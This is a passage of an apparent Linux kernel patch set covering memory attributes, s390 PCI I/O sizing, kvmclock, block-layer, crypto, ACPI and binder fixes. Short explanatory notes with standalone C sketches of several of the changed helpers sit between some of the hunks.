++	 * hugepage that is larger than that, so let's flush everything.
++	 */
++	flush_tlb_all();
++#else
++	ret =  walk_page_range_novma(&init_mm, start, end, &pageattr_ops, NULL,
++				     &masks);
++
+ 	mmap_write_unlock(&init_mm);
+ 
+ 	flush_tlb_kernel_range(start, end);
++#endif
+ 
+ 	return ret;
+ }
+@@ -158,36 +375,14 @@ int set_memory_nx(unsigned long addr, int numpages)
+ 
+ int set_direct_map_invalid_noflush(struct page *page)
+ {
+-	int ret;
+-	unsigned long start = (unsigned long)page_address(page);
+-	unsigned long end = start + PAGE_SIZE;
+-	struct pageattr_masks masks = {
+-		.set_mask = __pgprot(0),
+-		.clear_mask = __pgprot(_PAGE_PRESENT)
+-	};
+-
+-	mmap_read_lock(&init_mm);
+-	ret = walk_page_range(&init_mm, start, end, &pageattr_ops, &masks);
+-	mmap_read_unlock(&init_mm);
+-
+-	return ret;
++	return __set_memory((unsigned long)page_address(page), 1,
++			    __pgprot(0), __pgprot(_PAGE_PRESENT));
+ }
+ 
+ int set_direct_map_default_noflush(struct page *page)
+ {
+-	int ret;
+-	unsigned long start = (unsigned long)page_address(page);
+-	unsigned long end = start + PAGE_SIZE;
+-	struct pageattr_masks masks = {
+-		.set_mask = PAGE_KERNEL,
+-		.clear_mask = __pgprot(0)
+-	};
+-
+-	mmap_read_lock(&init_mm);
+-	ret = walk_page_range(&init_mm, start, end, &pageattr_ops, &masks);
+-	mmap_read_unlock(&init_mm);
+-
+-	return ret;
++	return __set_memory((unsigned long)page_address(page), 1,
++			    PAGE_KERNEL, __pgprot(_PAGE_EXEC));
+ }
+ 
+ #ifdef CONFIG_DEBUG_PAGEALLOC
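
The split helpers above all share the same skip test: a huge leaf is left intact when the chunk [vaddr, next) is an aligned, full-size block that the range being changed covers completely, because the protection bits can then be rewritten on the leaf itself; a split to the next level down happens only when the range cuts partway into it. A standalone sketch of that test at the PMD level, with the constants and helpers reimplemented purely for illustration:

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    #define PMD_SHIFT	21			/* 2 MiB leaves, as with Sv39 */
    #define PMD_SIZE	(1UL << PMD_SHIFT)
    #define PMD_MASK	(~(PMD_SIZE - 1))

    /* Mirrors pmd_addr_end(): end of the current PMD, clamped to 'end'. */
    static uintptr_t pmd_addr_end(uintptr_t addr, uintptr_t end)
    {
    	uintptr_t boundary = (addr + PMD_SIZE) & PMD_MASK;

    	return boundary < end ? boundary : end;
    }

    /* True when [vaddr, end) fully covers the PMD starting at vaddr:
     * vaddr <= (vaddr & PMD_MASK) holds only for an aligned vaddr, and
     * the other two terms require a full-size chunk inside the range. */
    static bool covers_whole_pmd(uintptr_t vaddr, uintptr_t end)
    {
    	uintptr_t next = pmd_addr_end(vaddr, end);

    	return next - vaddr >= PMD_SIZE &&
    	       vaddr <= (vaddr & PMD_MASK) && end >= next;
    }

    int main(void)
    {
    	printf("%d\n", covers_whole_pmd(0x200000, 0x400000)); /* 1: keep leaf */
    	printf("%d\n", covers_whole_pmd(0x201000, 0x400000)); /* 0: must split */
    	return 0;
    }
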
+diff --git a/arch/s390/include/asm/pci_io.h b/arch/s390/include/asm/pci_io.h
+index 287bb88f76986..2686bee800e3d 100644
+--- a/arch/s390/include/asm/pci_io.h
++++ b/arch/s390/include/asm/pci_io.h
+@@ -11,6 +11,8 @@
+ /* I/O size constraints */
+ #define ZPCI_MAX_READ_SIZE	8
+ #define ZPCI_MAX_WRITE_SIZE	128
++#define ZPCI_BOUNDARY_SIZE	(1 << 12)
++#define ZPCI_BOUNDARY_MASK	(ZPCI_BOUNDARY_SIZE - 1)
+ 
+ /* I/O Map */
+ #define ZPCI_IOMAP_SHIFT		48
+@@ -125,16 +127,18 @@ out:
+ int zpci_write_block(volatile void __iomem *dst, const void *src,
+ 		     unsigned long len);
+ 
+-static inline u8 zpci_get_max_write_size(u64 src, u64 dst, int len, int max)
++static inline int zpci_get_max_io_size(u64 src, u64 dst, int len, int max)
+ {
+-	int count = len > max ? max : len, size = 1;
++	int offset = dst & ZPCI_BOUNDARY_MASK;
++	int size;
+ 
+-	while (!(src & 0x1) && !(dst & 0x1) && ((size << 1) <= count)) {
+-		dst = dst >> 1;
+-		src = src >> 1;
+-		size = size << 1;
+-	}
+-	return size;
++	size = min3(len, ZPCI_BOUNDARY_SIZE - offset, max);
++	if (IS_ALIGNED(src, 8) && IS_ALIGNED(dst, 8) && IS_ALIGNED(size, 8))
++		return size;
++
++	if (size >= 8)
++		return 8;
++	return rounddown_pow_of_two(size);
+ }
+ 
+ static inline int zpci_memcpy_fromio(void *dst,
+@@ -144,9 +148,9 @@ static inline int zpci_memcpy_fromio(void *dst,
+ 	int size, rc = 0;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) src,
+-					       (u64) dst, n,
+-					       ZPCI_MAX_READ_SIZE);
++		size = zpci_get_max_io_size((u64 __force) src,
++					    (u64) dst, n,
++					    ZPCI_MAX_READ_SIZE);
+ 		rc = zpci_read_single(dst, src, size);
+ 		if (rc)
+ 			break;
+@@ -166,9 +170,9 @@ static inline int zpci_memcpy_toio(volatile void __iomem *dst,
+ 		return -EINVAL;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) dst,
+-					       (u64) src, n,
+-					       ZPCI_MAX_WRITE_SIZE);
++		size = zpci_get_max_io_size((u64 __force) dst,
++					    (u64) src, n,
++					    ZPCI_MAX_WRITE_SIZE);
+ 		if (size > 8) /* main path */
+ 			rc = zpci_write_block(dst, src, size);
+ 		else
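
The rewritten zpci_get_max_io_size() replaces the old halve-and-shift loop with arithmetic that is easier to audit: clamp the chunk to the remaining length, to the hardware maximum, and to the distance from dst to the next 4 KiB boundary, then use the whole chunk when src, dst and size are all 8-byte aligned, else fall back to 8 bytes or the largest power of two that fits. A userspace sketch with a worked example; the helpers are reimplemented here for illustration:

    #include <stdint.h>
    #include <stdio.h>

    #define BOUNDARY_SIZE	(1 << 12)		/* 4 KiB block boundary */
    #define BOUNDARY_MASK	(BOUNDARY_SIZE - 1)
    #define IS_ALIGNED(x, a)	(((x) & ((a) - 1)) == 0)

    static int min3(int a, int b, int c)
    {
    	int m = a < b ? a : b;

    	return m < c ? m : c;
    }

    static int rounddown_pow_of_two(int n)
    {
    	int p = 1;

    	while (p * 2 <= n)
    		p *= 2;
    	return p;
    }

    static int get_max_io_size(uint64_t src, uint64_t dst, int len, int max)
    {
    	int offset = dst & BOUNDARY_MASK;
    	int size = min3(len, BOUNDARY_SIZE - offset, max);

    	if (IS_ALIGNED(src, 8) && IS_ALIGNED(dst, 8) && IS_ALIGNED(size, 8))
    		return size;	/* one large, boundary-safe transfer */
    	if (size >= 8)
    		return 8;
    	return rounddown_pow_of_two(size);
    }

    int main(void)
    {
    	/* dst sits 16 bytes below a 4 KiB boundary, so the chunk is
    	 * capped at 16 even though 128 bytes remain to copy. */
    	printf("%d\n", get_max_io_size(0x1000, 0x2ff0, 128, 128)); /* 16 */
    	printf("%d\n", get_max_io_size(0x1001, 0x2ff0, 128, 128)); /*  8 */
    	return 0;
    }
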
+diff --git a/arch/s390/pci/pci_mmio.c b/arch/s390/pci/pci_mmio.c
+index 5880893329310..a90499c087f0c 100644
+--- a/arch/s390/pci/pci_mmio.c
++++ b/arch/s390/pci/pci_mmio.c
+@@ -97,9 +97,9 @@ static inline int __memcpy_toio_inuser(void __iomem *dst,
+ 		return -EINVAL;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) dst,
+-					       (u64 __force) src, n,
+-					       ZPCI_MAX_WRITE_SIZE);
++		size = zpci_get_max_io_size((u64 __force) dst,
++					    (u64 __force) src, n,
++					    ZPCI_MAX_WRITE_SIZE);
+ 		if (size > 8) /* main path */
+ 			rc = __pcistb_mio_inuser(dst, src, size, &status);
+ 		else
+@@ -242,9 +242,9 @@ static inline int __memcpy_fromio_inuser(void __user *dst,
+ 	u8 status;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) src,
+-					       (u64 __force) dst, n,
+-					       ZPCI_MAX_READ_SIZE);
++		size = zpci_get_max_io_size((u64 __force) src,
++					    (u64 __force) dst, n,
++					    ZPCI_MAX_READ_SIZE);
+ 		rc = __pcilg_mio_inuser(dst, src, size, &status);
+ 		if (rc)
+ 			break;
+diff --git a/arch/x86/kernel/cpu/mce/inject.c b/arch/x86/kernel/cpu/mce/inject.c
+index 12cf2e7ca33cc..87c15ab896517 100644
+--- a/arch/x86/kernel/cpu/mce/inject.c
++++ b/arch/x86/kernel/cpu/mce/inject.c
+@@ -747,6 +747,7 @@ static void check_hw_inj_possible(void)
+ 
+ 		wrmsrl_safe(mca_msr_reg(bank, MCA_STATUS), status);
+ 		rdmsrl_safe(mca_msr_reg(bank, MCA_STATUS), &status);
++		wrmsrl_safe(mca_msr_reg(bank, MCA_STATUS), 0);
+ 
+ 		if (!status) {
+ 			hw_injection_possible = false;
+diff --git a/arch/x86/kernel/kvmclock.c b/arch/x86/kernel/kvmclock.c
+index 16333ba1904ba..c067887d42df5 100644
+--- a/arch/x86/kernel/kvmclock.c
++++ b/arch/x86/kernel/kvmclock.c
+@@ -24,8 +24,8 @@
+ 
+ static int kvmclock __initdata = 1;
+ static int kvmclock_vsyscall __initdata = 1;
+-static int msr_kvm_system_time __ro_after_init = MSR_KVM_SYSTEM_TIME;
+-static int msr_kvm_wall_clock __ro_after_init = MSR_KVM_WALL_CLOCK;
++static int msr_kvm_system_time __ro_after_init;
++static int msr_kvm_wall_clock __ro_after_init;
+ static u64 kvm_sched_clock_offset __ro_after_init;
+ 
+ static int __init parse_no_kvmclock(char *arg)
+@@ -195,7 +195,8 @@ static void kvm_setup_secondary_clock(void)
+ 
+ void kvmclock_disable(void)
+ {
+-	native_write_msr(msr_kvm_system_time, 0, 0);
++	if (msr_kvm_system_time)
++		native_write_msr(msr_kvm_system_time, 0, 0);
+ }
+ 
+ static void __init kvmclock_init_mem(void)
+@@ -294,7 +295,10 @@ void __init kvmclock_init(void)
+ 	if (kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE2)) {
+ 		msr_kvm_system_time = MSR_KVM_SYSTEM_TIME_NEW;
+ 		msr_kvm_wall_clock = MSR_KVM_WALL_CLOCK_NEW;
+-	} else if (!kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE)) {
++	} else if (kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE)) {
++		msr_kvm_system_time = MSR_KVM_SYSTEM_TIME;
++		msr_kvm_wall_clock = MSR_KVM_WALL_CLOCK;
++	} else {
+ 		return;
+ 	}
+ 
+diff --git a/arch/x86/lib/misc.c b/arch/x86/lib/misc.c
+index a018ec4fba53e..c97be9a1430a0 100644
+--- a/arch/x86/lib/misc.c
++++ b/arch/x86/lib/misc.c
+@@ -6,7 +6,7 @@
+  */
+ int num_digits(int val)
+ {
+-	int m = 10;
++	long long m = 10;
+ 	int d = 1;
+ 
+ 	if (val < 0) {
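
The widened m matters because the counting loop keeps multiplying by ten until m exceeds val: for a ten-digit input such as INT_MAX, m reaches 10^9 and the next m *= 10 overflows a 32-bit int. The sketch below reconstructs the rest of the function from context to show the effect; treat the loop body as illustrative rather than a verbatim copy:

    #include <limits.h>
    #include <stdio.h>

    /* Digit count, including a '-' sign; 'm' must be wider than 'val'
     * or the final 'm *= 10' overflows once val has ten digits. */
    static int num_digits(int val)
    {
    	long long m = 10;
    	int d = 1;

    	if (val < 0) {
    		d++;
    		val = -val;
    	}

    	while (val >= m) {
    		m *= 10;
    		d++;
    	}
    	return d;
    }

    int main(void)
    {
    	printf("%d\n", num_digits(INT_MAX));	/* 10 */
    	printf("%d\n", num_digits(-12345));	/* 6, counting the sign */
    	return 0;
    }
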
+diff --git a/block/bio.c b/block/bio.c
+index 9ec72a78f1149..6c22dd7b6f278 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -1109,13 +1109,22 @@ bool bio_add_folio(struct bio *bio, struct folio *folio, size_t len,
+ 
+ void __bio_release_pages(struct bio *bio, bool mark_dirty)
+ {
+-	struct bvec_iter_all iter_all;
+-	struct bio_vec *bvec;
++	struct folio_iter fi;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (mark_dirty && !PageCompound(bvec->bv_page))
+-			set_page_dirty_lock(bvec->bv_page);
+-		put_page(bvec->bv_page);
++	bio_for_each_folio_all(fi, bio) {
++		struct page *page;
++		size_t done = 0;
++
++		if (mark_dirty) {
++			folio_lock(fi.folio);
++			folio_mark_dirty(fi.folio);
++			folio_unlock(fi.folio);
++		}
++		page = folio_page(fi.folio, fi.offset / PAGE_SIZE);
++		do {
++			folio_put(fi.folio);
++			done += PAGE_SIZE;
++		} while (done < fi.length);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(__bio_release_pages);
+@@ -1414,12 +1423,12 @@ EXPORT_SYMBOL(bio_free_pages);
+  */
+ void bio_set_pages_dirty(struct bio *bio)
+ {
+-	struct bio_vec *bvec;
+-	struct bvec_iter_all iter_all;
++	struct folio_iter fi;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (!PageCompound(bvec->bv_page))
+-			set_page_dirty_lock(bvec->bv_page);
++	bio_for_each_folio_all(fi, bio) {
++		folio_lock(fi.folio);
++		folio_mark_dirty(fi.folio);
++		folio_unlock(fi.folio);
+ 	}
+ }
+ 
+@@ -1462,12 +1471,11 @@ static void bio_dirty_fn(struct work_struct *work)
+ 
+ void bio_check_pages_dirty(struct bio *bio)
+ {
+-	struct bio_vec *bvec;
++	struct folio_iter fi;
+ 	unsigned long flags;
+-	struct bvec_iter_all iter_all;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (!PageDirty(bvec->bv_page) && !PageCompound(bvec->bv_page))
++	bio_for_each_folio_all(fi, bio) {
++		if (!folio_test_dirty(fi.folio))
+ 			goto defer;
+ 	}
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 368f1947c8956..b3f99dda45300 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2946,12 +2946,6 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	if (bio_may_exceed_limits(bio, &q->limits)) {
+-		bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
+-		if (!bio)
+-			return;
+-	}
+-
+ 	bio_set_ioprio(bio);
+ 
+ 	if (plug) {
+@@ -2960,6 +2954,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 			rq = NULL;
+ 	}
+ 	if (rq) {
++		if (unlikely(bio_may_exceed_limits(bio, &q->limits))) {
++			bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++			if (!bio)
++				return;
++		}
+ 		if (!bio_integrity_prep(bio))
+ 			return;
+ 		if (blk_mq_attempt_bio_merge(q, bio, nr_segs))
+@@ -2970,6 +2969,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	} else {
+ 		if (unlikely(bio_queue_enter(bio)))
+ 			return;
++		if (unlikely(bio_may_exceed_limits(bio, &q->limits))) {
++			bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++			if (!bio)
++				goto fail;
++		}
+ 		if (!bio_integrity_prep(bio))
+ 			goto fail;
+ 	}
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 86ff375c00ce4..bbca4ce77a2d3 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -135,7 +135,7 @@ void blk_queue_max_hw_sectors(struct request_queue *q, unsigned int max_hw_secto
+ 	limits->max_hw_sectors = max_hw_sectors;
+ 
+ 	max_sectors = min_not_zero(max_hw_sectors, limits->max_dev_sectors);
+-	max_sectors = min_t(unsigned int, max_sectors, BLK_DEF_MAX_SECTORS);
++	max_sectors = min(max_sectors, BLK_DEF_MAX_SECTORS);
+ 	max_sectors = round_down(max_sectors,
+ 				 limits->logical_block_size >> SECTOR_SHIFT);
+ 	limits->max_sectors = max_sectors;
+diff --git a/block/genhd.c b/block/genhd.c
+index afab646d12c85..ddb17c4adc8a2 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -444,7 +444,9 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 				DISK_MAX_PARTS);
+ 			disk->minors = DISK_MAX_PARTS;
+ 		}
+-		if (disk->first_minor + disk->minors > MINORMASK + 1)
++		if (disk->first_minor > MINORMASK ||
++		    disk->minors > MINORMASK + 1 ||
++		    disk->first_minor + disk->minors > MINORMASK + 1)
+ 			goto out_exit_elevator;
+ 	} else {
+ 		if (WARN_ON(disk->minors))
+@@ -567,6 +569,7 @@ out_del_integrity:
+ out_del_block_link:
+ 	if (!sysfs_deprecated)
+ 		sysfs_remove_link(block_depr, dev_name(ddev));
++	pm_runtime_set_memalloc_noio(ddev, false);
+ out_device_del:
+ 	device_del(ddev);
+ out_free_ext_minor:
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 3c475e4166e9f..ebe4a2653622b 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -18,7 +18,7 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ {
+ 	struct gendisk *disk = bdev->bd_disk;
+ 	struct blkpg_partition p;
+-	long long start, length;
++	sector_t start, length;
+ 
+ 	if (disk->flags & GENHD_FL_NO_PART)
+ 		return -EINVAL;
+@@ -35,14 +35,17 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	if (op == BLKPG_DEL_PARTITION)
+ 		return bdev_del_partition(disk, p.pno);
+ 
++	if (p.start < 0 || p.length <= 0 || p.start + p.length < 0)
++		return -EINVAL;
++	/* Check that the partition is aligned to the block size */
++	if (!IS_ALIGNED(p.start | p.length, bdev_logical_block_size(bdev)))
++		return -EINVAL;
++
+ 	start = p.start >> SECTOR_SHIFT;
+ 	length = p.length >> SECTOR_SHIFT;
+ 
+ 	switch (op) {
+ 	case BLKPG_ADD_PARTITION:
+-		/* check if partition is aligned to blocksize */
+-		if (p.start & (bdev_logical_block_size(bdev) - 1))
+-			return -EINVAL;
+ 		return bdev_add_partition(disk, p.pno, start, length);
+ 	case BLKPG_RESIZE_PARTITION:
+ 		return bdev_resize_partition(disk, p.pno, start, length);
+diff --git a/crypto/af_alg.c b/crypto/af_alg.c
+index e893c0f6c8799..fef69d2a6b183 100644
+--- a/crypto/af_alg.c
++++ b/crypto/af_alg.c
+@@ -1045,9 +1045,13 @@ EXPORT_SYMBOL_GPL(af_alg_sendpage);
+ void af_alg_free_resources(struct af_alg_async_req *areq)
+ {
+ 	struct sock *sk = areq->sk;
++	struct af_alg_ctx *ctx;
+ 
+ 	af_alg_free_areq_sgls(areq);
+ 	sock_kfree_s(sk, areq, areq->areqlen);
++
++	ctx = alg_sk(sk)->private;
++	ctx->inflight = false;
+ }
+ EXPORT_SYMBOL_GPL(af_alg_free_resources);
+ 
+@@ -1117,11 +1121,19 @@ EXPORT_SYMBOL_GPL(af_alg_poll);
+ struct af_alg_async_req *af_alg_alloc_areq(struct sock *sk,
+ 					   unsigned int areqlen)
+ {
+-	struct af_alg_async_req *areq = sock_kmalloc(sk, areqlen, GFP_KERNEL);
++	struct af_alg_ctx *ctx = alg_sk(sk)->private;
++	struct af_alg_async_req *areq;
++
++	/* Only one AIO request can be in flight. */
++	if (ctx->inflight)
++		return ERR_PTR(-EBUSY);
+ 
++	areq = sock_kmalloc(sk, areqlen, GFP_KERNEL);
+ 	if (unlikely(!areq))
+ 		return ERR_PTR(-ENOMEM);
+ 
++	ctx->inflight = true;
++
+ 	areq->areqlen = areqlen;
+ 	areq->sk = sk;
+ 	areq->last_rsgl = NULL;
+diff --git a/crypto/scompress.c b/crypto/scompress.c
+index 738f4f8f0f41a..4d6366a444007 100644
+--- a/crypto/scompress.c
++++ b/crypto/scompress.c
+@@ -124,6 +124,7 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 	struct crypto_scomp *scomp = *tfm_ctx;
+ 	void **ctx = acomp_request_ctx(req);
+ 	struct scomp_scratch *scratch;
++	unsigned int dlen;
+ 	int ret;
+ 
+ 	if (!req->src || !req->slen || req->slen > SCOMP_SCRATCH_SIZE)
+@@ -135,6 +136,8 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 	if (!req->dlen || req->dlen > SCOMP_SCRATCH_SIZE)
+ 		req->dlen = SCOMP_SCRATCH_SIZE;
+ 
++	dlen = req->dlen;
++
+ 	scratch = raw_cpu_ptr(&scomp_scratch);
+ 	spin_lock(&scratch->lock);
+ 
+@@ -152,6 +155,9 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 				ret = -ENOMEM;
+ 				goto out;
+ 			}
++		} else if (req->dlen > dlen) {
++			ret = -ENOSPC;
++			goto out;
+ 		}
+ 		scatterwalk_map_and_copy(scratch->dst, req->dst, 0, req->dlen,
+ 					 1);
+diff --git a/drivers/acpi/acpi_extlog.c b/drivers/acpi/acpi_extlog.c
+index e648158368a7d..088db2356998f 100644
+--- a/drivers/acpi/acpi_extlog.c
++++ b/drivers/acpi/acpi_extlog.c
+@@ -145,9 +145,14 @@ static int extlog_print(struct notifier_block *nb, unsigned long val,
+ 	static u32 err_seq;
+ 
+ 	estatus = extlog_elog_entry_check(cpu, bank);
+-	if (estatus == NULL || (mce->kflags & MCE_HANDLED_CEC))
++	if (!estatus)
+ 		return NOTIFY_DONE;
+ 
++	if (mce->kflags & MCE_HANDLED_CEC) {
++		estatus->block_status = 0;
++		return NOTIFY_DONE;
++	}
++
+ 	memcpy(elog_buf, (void *)estatus, ELOG_ENTRY_LEN);
+ 	/* clear record status to enable BIOS to update it again */
+ 	estatus->block_status = 0;
+diff --git a/drivers/acpi/acpi_lpit.c b/drivers/acpi/acpi_lpit.c
+index 50540d4d4948e..2c015ecf71853 100644
+--- a/drivers/acpi/acpi_lpit.c
++++ b/drivers/acpi/acpi_lpit.c
+@@ -98,7 +98,7 @@ static void lpit_update_residency(struct lpit_residency_info *info,
+ 				 struct acpi_lpit_native *lpit_native)
+ {
+ 	info->frequency = lpit_native->counter_frequency ?
+-				lpit_native->counter_frequency : tsc_khz * 1000;
++				lpit_native->counter_frequency : mul_u32_u32(tsc_khz, 1000U);
+ 	if (!info->frequency)
+ 		info->frequency = 1;
+ 
+diff --git a/drivers/acpi/acpi_lpss.c b/drivers/acpi/acpi_lpss.c
+index f08ffa75f4a76..8b44743945c8b 100644
+--- a/drivers/acpi/acpi_lpss.c
++++ b/drivers/acpi/acpi_lpss.c
+@@ -450,8 +450,9 @@ static int register_device_clock(struct acpi_device *adev,
+ 		if (!clk_name)
+ 			return -ENOMEM;
+ 		clk = clk_register_fractional_divider(NULL, clk_name, parent,
++						      0, prv_base, 1, 15, 16, 15,
+ 						      CLK_FRAC_DIVIDER_POWER_OF_TWO_PS,
+-						      prv_base, 1, 15, 16, 15, 0, NULL);
++						      NULL);
+ 		parent = clk_name;
+ 
+ 		clk_name = kasprintf(GFP_KERNEL, "%s-update", devname);
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index ed318485eb192..f7852fb75ab39 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1726,12 +1726,12 @@ static void acpi_video_dev_register_backlight(struct acpi_video_device *device)
+ 		return;
+ 	count++;
+ 
+-	acpi_get_parent(device->dev->handle, &acpi_parent);
+-
+-	pdev = acpi_get_pci_dev(acpi_parent);
+-	if (pdev) {
+-		parent = &pdev->dev;
+-		pci_dev_put(pdev);
++	if (ACPI_SUCCESS(acpi_get_parent(device->dev->handle, &acpi_parent))) {
++		pdev = acpi_get_pci_dev(acpi_parent);
++		if (pdev) {
++			parent = &pdev->dev;
++			pci_dev_put(pdev);
++		}
+ 	}
+ 
+ 	memset(&props, 0, sizeof(struct backlight_properties));
+diff --git a/drivers/acpi/property.c b/drivers/acpi/property.c
+index 0565c18c2ee31..62aee900af3df 100644
+--- a/drivers/acpi/property.c
++++ b/drivers/acpi/property.c
+@@ -851,6 +851,7 @@ static int acpi_get_ref_args(struct fwnode_reference_args *args,
+  * @index: Index of the reference to return
+  * @num_args: Maximum number of arguments after each reference
+  * @args: Location to store the returned reference with optional arguments
++ *	  (may be NULL)
+  *
+  * Find property with @name, verifify that it is a package containing at least
+  * one object reference and if so, store the ACPI device object pointer to the
+@@ -907,6 +908,9 @@ int __acpi_node_get_property_reference(const struct fwnode_handle *fwnode,
+ 		if (!device)
+ 			return -EINVAL;
+ 
++		if (!args)
++			return 0;
++
+ 		args->fwnode = acpi_fwnode_handle(device);
+ 		args->nargs = 0;
+ 		return 0;
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index ed607850f87fb..fcbb750b1ccc3 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -271,7 +271,7 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 	}
+ 	if (mm) {
+ 		mmap_write_unlock(mm);
+-		mmput(mm);
++		mmput_async(mm);
+ 	}
+ 	return 0;
+ 
+@@ -304,7 +304,7 @@ err_page_ptr_cleared:
+ err_no_vma:
+ 	if (mm) {
+ 		mmap_write_unlock(mm);
+-		mmput(mm);
++		mmput_async(mm);
+ 	}
+ 	return vma ? -ENOMEM : -ESRCH;
+ }
+@@ -344,8 +344,7 @@ static bool debug_low_async_space_locked(struct binder_alloc *alloc, int pid)
+ 			continue;
+ 		if (!buffer->async_transaction)
+ 			continue;
+-		total_alloc_size += binder_alloc_buffer_size(alloc, buffer)
+-			+ sizeof(struct binder_buffer);
++		total_alloc_size += binder_alloc_buffer_size(alloc, buffer);
+ 		num_buffers++;
+ 	}
+ 
+@@ -407,17 +406,17 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 				alloc->pid, extra_buffers_size);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+-	if (is_async &&
+-	    alloc->free_async_space < size + sizeof(struct binder_buffer)) {
++
++	/* Pad 0-size buffers so they get assigned unique addresses */
++	size = max(size, sizeof(void *));
++
++	if (is_async && alloc->free_async_space < size) {
+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
+ 			     "%d: binder_alloc_buf size %zd failed, no async space left\n",
+ 			      alloc->pid, size);
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+ 
+-	/* Pad 0-size buffers so they get assigned unique addresses */
+-	size = max(size, sizeof(void *));
+-
+ 	while (n) {
+ 		buffer = rb_entry(n, struct binder_buffer, rb_node);
+ 		BUG_ON(!buffer->free);
+@@ -519,7 +518,7 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 	buffer->pid = pid;
+ 	buffer->oneway_spam_suspect = false;
+ 	if (is_async) {
+-		alloc->free_async_space -= size + sizeof(struct binder_buffer);
++		alloc->free_async_space -= size;
+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC_ASYNC,
+ 			     "%d: binder_alloc_buf size %zd async free %zd\n",
+ 			      alloc->pid, size, alloc->free_async_space);
+@@ -657,8 +656,7 @@ static void binder_free_buf_locked(struct binder_alloc *alloc,
+ 	BUG_ON(buffer->user_data > alloc->buffer + alloc->buffer_size);
+ 
+ 	if (buffer->async_transaction) {
+-		alloc->free_async_space += buffer_size + sizeof(struct binder_buffer);
+-
++		alloc->free_async_space += buffer_size;
+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC_ASYNC,
+ 			     "%d: binder_free_buf size %zd async free %zd\n",
+ 			      alloc->pid, size, alloc->free_async_space);
+diff --git a/drivers/base/node.c b/drivers/base/node.c
+index faf3597a96da9..a4141b57b1478 100644
+--- a/drivers/base/node.c
++++ b/drivers/base/node.c
+@@ -859,11 +859,15 @@ int __register_one_node(int nid)
+ {
+ 	int error;
+ 	int cpu;
++	struct node *node;
+ 
+-	node_devices[nid] = kzalloc(sizeof(struct node), GFP_KERNEL);
+-	if (!node_devices[nid])
++	node = kzalloc(sizeof(struct node), GFP_KERNEL);
++	if (!node)
+ 		return -ENOMEM;
+ 
++	INIT_LIST_HEAD(&node->access_list);
++	node_devices[nid] = node;
++
+ 	error = register_node(node_devices[nid], nid);
+ 
+ 	/* link cpu under this node */
+@@ -872,7 +876,6 @@ int __register_one_node(int nid)
+ 			register_cpu_under_node(cpu, nid);
+ 	}
+ 
+-	INIT_LIST_HEAD(&node_devices[nid]->access_list);
+ 	node_init_caches(nid);
+ 
+ 	return error;
+diff --git a/drivers/base/swnode.c b/drivers/base/swnode.c
+index 0a482212c7e8e..44153caa893ad 100644
+--- a/drivers/base/swnode.c
++++ b/drivers/base/swnode.c
+@@ -541,6 +541,9 @@ software_node_get_reference_args(const struct fwnode_handle *fwnode,
+ 	if (nargs > NR_FWNODE_REFERENCE_ARGS)
+ 		return -EINVAL;
+ 
++	if (!args)
++		return 0;
++
+ 	args->fwnode = software_node_get(refnode);
+ 	args->nargs = nargs;
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 127e3ceb59799..12ff6f58b8a90 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -165,39 +165,37 @@ static loff_t get_loop_size(struct loop_device *lo, struct file *file)
+ 	return get_size(lo->lo_offset, lo->lo_sizelimit, file);
+ }
+ 
++/*
++ * We support direct I/O only if lo_offset is aligned with the logical I/O size
++ * of backing device, and the logical block size of loop is bigger than that of
++ * the backing device.
++ */
++static bool lo_bdev_can_use_dio(struct loop_device *lo,
++		struct block_device *backing_bdev)
++{
++	unsigned short sb_bsize = bdev_logical_block_size(backing_bdev);
++
++	if (queue_logical_block_size(lo->lo_queue) < sb_bsize)
++		return false;
